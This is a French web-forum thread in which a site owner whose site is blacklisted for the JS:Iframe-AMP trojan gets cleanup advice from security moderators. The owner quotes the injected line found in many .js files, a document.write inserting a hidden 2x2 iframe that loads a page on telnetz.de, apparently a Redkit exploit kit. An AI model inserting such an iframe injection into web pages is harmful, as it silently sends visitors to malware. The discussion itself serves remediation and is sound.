Supprimer JS:Iframe-AMP [Trj]

Trinity29 -  
Malekal_morte- Messages postés 184347 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonsoir
Depuis plusieurs jours, mon site web Garodevoirs est blacklisté par Google, pour cause de malware.
J'ai analysé le contenu de mon ftp et mon antivirus y a trouvé la menace JS:Iframe-AMP [Trj].
Malheureusement il ne peut réparer les fichiers infectés. Et ce sont des fichiers .php importants de mon site, donc je ne peux pas les supprimer...
Pourriez-vous m'aider à me débarrasser de cela svp?
Je vous remercie.
A voir également:

3 réponses

juju666 Messages postés 38404 Statut Contributeur sécurité 4 796
 
Salut

Go ouvrir notepad++ et supprimer les <script> néfastes.

Entre nous :

- Tes régies pub elles ont l'air craignos
- Vous avez une sale réputation sur WOT
- Mozilla Foundation bloque ton site
- et Google également, comme tu le cite ...

A+

.::. Contributeur Sécurité .::.
1
Malekal_morte- Messages postés 184347 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 691
 
Salut,

Faut que tu nettoyes le code qui génère le script malicieux ou que tu repartes d'une sauvegarde antérieure qui n'a pas été infectée.
Voir exemple là : https://www.malekal.com/virus-securite/

Ensuite faut sécuriser ton code car tu dois avor une vulnérabilité qui a permis le hack, peut-être une sql injection.
0
Trinity29
 
Merci pour vos réponses.
Je suis en train de supprimer les codes suspects, mais dans de nombreux .js il y a cela au tout début du fichier: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://telnetz.de/cewf.html?j=3349784></iframe>');
Pouvez-vous me dire quelle partie garder exactement svp? Je vais devoir le faire dans des dizaines de fichiers donc je n'aimerais pas me montrer d'un ' ou quoi ;).
Merci.
0
Malekal_morte- Messages postés 184347 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 691
 
faut tout vrier là.
On dirait du redkit.
0
Trinity29
 
C'est quoi du redkit?
Et il faut vraiment tout enlever?
Je veux dire, il n'y a même pas à garder le début, document.write ni les parenthèses ni rien?
0
Malekal_morte- Messages postés 184347 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 691
 
non vire tout.
0